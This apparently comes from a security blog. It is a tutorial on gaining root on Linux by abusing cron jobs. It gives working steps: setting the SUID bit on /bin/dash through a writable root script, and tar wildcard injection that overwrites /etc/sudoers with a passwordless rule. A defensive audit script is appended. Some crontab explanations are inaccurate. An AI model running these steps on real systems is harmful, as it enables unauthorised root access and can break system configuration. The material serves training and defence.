Privilege Escalation

Linux Privilege Escalation by Exploiting Cronjobs

After solving several OSCP challenges, we decided to write this article on the various methods used for Linux privilege escalation, which could be helpful to our readers in their penetration testing projects. In this article we will learn privilege escalation by exploiting cron jobs to gain root access on a remote host, and we will also examine how a badly implemented cron job can lead to privilege escalation. If you have solved post-exploitation CTF challenges, then by reading this article you will recognise the loopholes that lead to privilege escalation.

For details, you can read our previous articles where we applied this trick for privilege escalation. Open the links given below:

Link1: Hack the Box Challenge: Europa Walkthrough

Link2: Hack the Milnet VM (CTF Challenge)

Table of contents

  • Introduction
  • Cron job
  • Crontab syntax
  • Crontab File overwrite
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)
  • Crontab Tar wildcard Injection
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)

Let’s Start!!!

What is a cron job?

Cron jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They are most commonly used for sysadmin jobs such as backups or cleaning the /tmp/ directory. The word Cron comes from crontab, and the crontab file is present inside the /etc directory.


For example, inside crontab we can add the following entry to print the apache error log automatically every 1 hour.

1 0 * * * printf "" > /var/log/apache/error_log

Crontab File overwrite

Lab Setup for the Poorly configured cron job

Objective: Set a new job with the help of crontab to run a python script which will erase all data from a particular directory.

Let's assume “cleanup” is the directory whose data will be cleared automatically every two minutes. Thus we have saved some data inside /home/cleanup.

mkdir cleanup
cd cleanup
echo "hello friends" > 1.txt
echo "ALL files will be deleted in 2 mints" > 2.txt
echo > 1.php
echo > 2.php
ls

As you can observe from the given image, some files are stored inside the cleanup directory.

Now write a python program in any other directory to delete the data inside /home/cleanup and give it all permissions.

cd /tmp
nano cleanup.py

#!/usr/bin/env python
import os
import sys

try:
    # the shell expands the glob, so every file under /home/cleanup is removed
    os.system('rm -r /home/cleanup/*')
except:
    sys.exit()

chmod 777 cleanup.py

At last, schedule a task with the help of crontab to run cleanup.py every 2 minutes.

nano /etc/crontab
*/2 *   * * *   root    /tmp/cleanup.py

Now let's verify our objective.

chmod 777 cleanup.py
cd /home/cleanup
ls
date
ls
date

Cool!! It is working; as you can see, all files have been deleted after two minutes.

Post Exploitation

Start your attacking machine, first compromise the target system, and then move to the privilege escalation stage. Suppose I successfully log in to the victim's machine through ssh and get a non-root user terminal. Execute the following commands as shown below.

cat /etc/crontab
ls  -al /tmp/cleanup.py
cat /tmp/cleanup.py

From the above steps we notice that crontab is running the python script every two minutes; now let's exploit it.

There are many methods to gain root access; in this method we set the SUID bit on /bin/dash. It is quite simple: first open the file in an editor, for example nano cleanup.py, and replace the rm command in the os.system line with the one given below.

os.system('chmod u+s /bin/dash')

After two minutes it will set the SUID permission on /bin/dash, and when you run it, it will give root access.

/bin/dash
id
whoami

Awesome!! We hit the Goal…………………

Crontab Tar Wildcard Injection

Lab Setup

Objective: schedule a task with the help of crontab to take a backup of the HTML directory with the tar archival program.

The directory whose backup you are going to take should have executable permission.

Now schedule a task with the help of crontab to run the tar archival program, taking a backup of /var/www/html into /var/backups every 1 minute.

nano /etc/crontab
*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

Let's verify whether the schedule is working by executing the following commands.

cd /var/backups
ls
date

From the image given below you can notice that the html.tgz file has been generated after 1 minute.

Post Exploitation

Start your attacking machine, first compromise the target system, and then move to the privilege escalation stage. Suppose I successfully log in to the victim's machine through ssh and get a non-root user terminal. Then open crontab to view whether any job is scheduled.

cat /etc/crontab

Here we notice that the target has scheduled the tar archival program every 1 minute, and we know that the cron job runs as root. Let's try to exploit it.

Execute the following commands to grant sudo rights to the logged-in user; this post-exploitation technique is known as wildcard injection.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

Now after 1 minute it will grant sudo rights to the user ignite, as you can confirm from the image given below.

sudo -l
sudo bash
whoami

YUPPIEEEE!!! We have successfully obtained root access.
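Both weaknesses used above, a root cron job that runs a script other users can modify (the cleanup.py lab) and a root cron job that calls tar with a shell wildcard (the html backup lab), can be caught by a simple audit of /etc/crontab. The following Python script is an added example, not code from the original post; the crontab text and the file metadata it checks are constructed, and the FAKE_FS lookup stands in for os.stat() so that it runs offline.

```python
# Added audit example, not from the original post: flags /etc/crontab jobs that run a
# script writable by non-root users (cleanup.py) or call tar with a shell wildcard (html backup).
import os, re, shlex, stat
from collections import namedtuple

FakeStat = namedtuple("FakeStat", "st_mode st_uid")

# Constructed system crontab (five time fields, a user column, then the command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m  h  dom mon dow user  command
*/2 *  *   *   *   root  /tmp/cleanup.py
*/1 *  *   *   *   root  tar -zcf /var/backups/html.tgz /var/www/html/*
0   3  *   *   *   root  /usr/local/sbin/rotate-logs.sh
"""
# Constructed stand-in for os.stat() describing the lab host's files.
FAKE_FS = {
    "/tmp/cleanup.py": FakeStat(0o100777, 1000),              # mode 777, owned by uid 1000
    "/usr/local/sbin/rotate-logs.sh": FakeStat(0o100755, 0),  # mode 755, owned by root
}

def parse_system_crontab(text):
    """Yield (schedule, user, command) per job line; skip blanks, comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield " ".join(fields[:5]), fields[5], fields[6]

def audit_entry(user, command, stat_fn=os.stat):
    """Return findings for one job. Only the first word of the command is stat'ed."""
    findings, argv = [], shlex.split(command) or [""]
    try:
        st = stat_fn(argv[0])
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) or (user == "root" and st.st_uid != 0):
            findings.append("%s job runs %s, which is group/world-writable or not root-owned" % (user, argv[0]))
    except (FileNotFoundError, KeyError):
        pass  # bare names such as "tar" resolve via PATH and are not checked here
    if os.path.basename(argv[0]) == "tar" and any(c in a for a in argv[1:] for c in "*?"):
        findings.append("%s job calls tar with a shell wildcard; pass a directory path (or '--' before the file list) instead" % user)
    return findings

def audit_crontab(text, stat_fn=os.stat):
    return [f for _, user, cmd in parse_system_crontab(text) for f in audit_entry(user, cmd, stat_fn)]

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB, stat_fn=lambda p: FAKE_FS[p]):
        print(finding)
```

Run against a real host, drop the stat_fn argument so os.stat() is used, and read /etc/crontab (and the files under /etc/cron.d) into the text argument.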

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here